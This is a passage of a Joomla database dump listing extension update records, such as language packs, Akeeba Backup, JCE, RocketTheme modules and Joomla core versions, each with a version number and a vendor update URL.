Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32585,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32586,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.9.3','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32587,3,0,'Spanish','','pkg_es-ES','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32588,3,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32589,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32590,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32591,3,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32592,3,0,'Thai','','pkg_th-TH','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32593,3,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32594,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32595,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32596,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32597,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','https://updates.rockettheme.com/joomla/138/b61e70db','',''),(32598,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/138/2084920890','',''),(32599,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','https://updates.rockettheme.com/joomla/286/21ffe006','',''),(32600,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/286/326466299','',''),(32601,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','https://updates.rockettheme.com/joomla/287/cb577720','',''),(32602,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','https://updates.rockettheme.com/joomla/301/dfc993d8','',''),(32603,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(32604,20,0,'RokGallery','','','component','',0,'2.46','0802','https://updates.rockettheme.com/joomla/313/1985305838','',''),(32605,20,0,'RokWeather','','','module','',0,'2.0.4','0802','https://updates.rockettheme.com/joomla/313/1307741342','',''),(32606,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','https://updates.rockettheme.com/joomla/313/1301311221','',''),(32607,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/381/337128173','',''),(32608,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','https://updates.rockettheme.com/joomla/559/1033ef39','',''),(32609,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32610,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32611,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32612,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32613,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32614,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32615,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32616,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32617,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32618,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32619,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32620,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32621,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32622,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32623,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32624,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32625,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32626,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32627,57,0,'French','','pkg_fr-FR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32628,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32629,57,0,'German','','pkg_de-DE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32630,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32631,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32632,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32633,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32634,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32635,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32636,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32637,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32638,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32639,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32640,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32641,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32642,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32643,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32644,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32645,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32646,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32647,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32648,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32649,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32650,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32651,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.9.3','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32652,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32653,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32654,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32655,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32656,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32657,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32658,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32659,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32660,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32661,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32662,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32663,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.1.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-1-2			\n		',''),(32664,129,0,'JCE 2.9.24','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.24','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-24-released',''),(32665,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.9','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(32666,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(32667,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(32668,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(32669,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(32670,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(32671,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(32672,57,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(32673,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(32674,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(32675,57,0,'Danish','','pkg_da-DK','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(32676,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(32677,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(32678,57,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(32679,57,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(32680,57,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(32681,57,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(32682,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(32683,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(32684,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(32685,57,0,'French','','pkg_fr-FR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(32686,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(32687,57,0,'German','','pkg_de-DE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(32688,57,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(32689,57,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(32690,57,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(32691,57,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(32692,57,0,'Greek','','pkg_el-GR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(32693,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.8.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(32694,57,0,'Italian','','pkg_it-IT','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(32695,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(32696,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(32697,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(32698,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(32699,57,0,'Norwegian Bokmål','','pkg_nb-NO','package','',0,'3.10.0.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(32700,57,0,'Persian Farsi','','pkg_fa-IR','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(32701,57,0,'Polish','','pkg_pl-PL','package','',0,'3.10.6.3','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(32702,57,0,'Portuguese, Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(32703,57,0,'Portuguese, Portugal','','pkg_pt-PT','package','',0,'3.9.29.2','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(32704,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(32705,57,0,'Russian','','pkg_ru-RU','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(32706,57,0,'Serbian, Cyrillic','','pkg_sr-RS','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(32707,57,0,'Serbian, Latin','','pkg_sr-YU','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(32708,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.10.5.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(32709,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.10.9.3','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(32710,57,0,'Spanish','','pkg_es-ES','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(32711,57,0,'Spanish, Colombia','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(32712,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(32713,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(32714,57,0,'Tamil, India','','pkg_ta-IN','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(32715,57,0,'Thai','','pkg_th-TH','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(32716,57,0,'Turkish','','pkg_tr-TR','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/tr-TR_details.xml','',''),(32717,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.10.2.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(32718,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(32719,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.10.9.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(32720,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32721,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'5.1.2','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-5-1-2			\n		',''),(32722,129,0,'JCE 2.9.24','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.24','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-24-released',''),(32723,130,0,'T3 System Plugin','','t3','plugin','system',0,'3.0.9','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml','http://www.joomlart.com/update-steps',''),(32724,135,0,' Phoca Gallery ',' Phoca Gallery is an efficient image gallery extension for Joomla! CMS. ','com_phocagallery','component','',1,'4.4.3','','https://raw.githubusercontent.com/PhocaCz/PhocaGallery/master/manifest.xml','http://www.phoca.cz/version/index.php?phocagallery=4.4.3',''),(32725,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32726,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32727,1,0,'Joomla','','joomla','file','',0,'3.10.9','','https://update.joomla.org/core/extension.xml','',''),(32728,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32729,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.7','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-7.html',''),(32730,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32731,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32732,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32733,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32734,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32735,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32736,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32737,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32738,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32739,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32740,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32741,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32742,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32743,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32744,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32745,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32746,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32747,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32748,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32749,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32750,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32751,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32752,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32753,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32754,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32755,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32756,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32757,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32758,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32759,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32760,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32761,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32762,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32763,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32764,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32765,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32766,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32767,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32768,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32769,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32770,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32771,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32772,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32773,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32774,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32775,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32776,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32777,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32778,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32779,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32780,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32781,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32782,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32783,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32784,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32785,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32786,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32787,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32788,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32789,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32790,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32791,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32792,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32793,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.1.8','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-1-8.html',''),(32794,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32795,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32796,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32797,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32798,1,0,'Joomla','','joomla','file','',0,'3.10.10','','https://update.joomla.org/core/extension.xml','',''),(32799,67,0,'Akeeba Backup Core 